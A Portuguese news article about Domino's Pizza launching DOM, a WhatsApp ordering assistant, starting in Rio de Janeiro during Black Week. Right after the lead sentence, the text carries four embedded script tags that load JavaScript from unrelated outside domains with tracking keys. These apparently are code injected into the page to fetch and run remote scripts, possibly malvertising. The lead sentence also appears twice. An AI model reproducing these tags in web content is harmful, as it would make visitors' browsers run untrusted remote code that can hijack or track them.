Mídia

Domino's lança assistente virtual para pedidos pelo WhatsApp

No Rio de Janeiro, o DOM já receberá pedidos para a Black Week, com ofertas de duas pizzas pelo preço de uma. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573702282443" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

No Rio de Janeiro, o DOM já receberá pedidos para a Black Week, com ofertas de duas pizzas pelo preço de uma.

A Domino's Pizza acaba de lançar um assistente virtual para receber os pedidos de seus clientes pelo WhatsApp, o DOM.

Confira as últimas novidades sobre marketing digital aqui.

Leia também: Domino's provoca concorrência em nova campanha digital.

Esta é a primeira entrega de um pacote de mudanças e novidades que os clientes da rede vão experimentar nos próximos anos.

De início, somente as lojas próprias do Rio de Janeiro começam a receber pedidos desta forma, inclusive para o período de promoções da Black Week. Entre os dias 25 e 29 de novembro, na compra de uma pizza média ou grande da Domino's, a segunda sai de graça.

Segundo Carlos Eduardo Martins, CEO da rede no Brasil, o restante do país estará integrado já no primeiro semestre do ano que vem.

"A Domino's é reconhecida mundialmente por seus investimentos em tecnologia e delivery e nosso desafio é avançar 40 anos em cinco. Desta vez, saímos na frente lançando pedidos por WhatsApp, o que lá fora ainda não acontec.e", explica ele.  "Assim, estaremos ainda mais próximos do nosso cliente, garantindo uma comunicação fácil e a entrega de nossos produtos em menos de 30 minutos, um importante atributo nosso.”, conclui.

Para os amantes de Domino's que resolvem a vida pelo celular, o processo é bem rápido. O novo formato de atendimento exigirá um cadastro simples e objetivo, reconhecendo os dados do cliente para agilizar o pedido. O sistema enviará cardápio, tipos de massa e sabores, além das ofertas e dos combos disponíveis.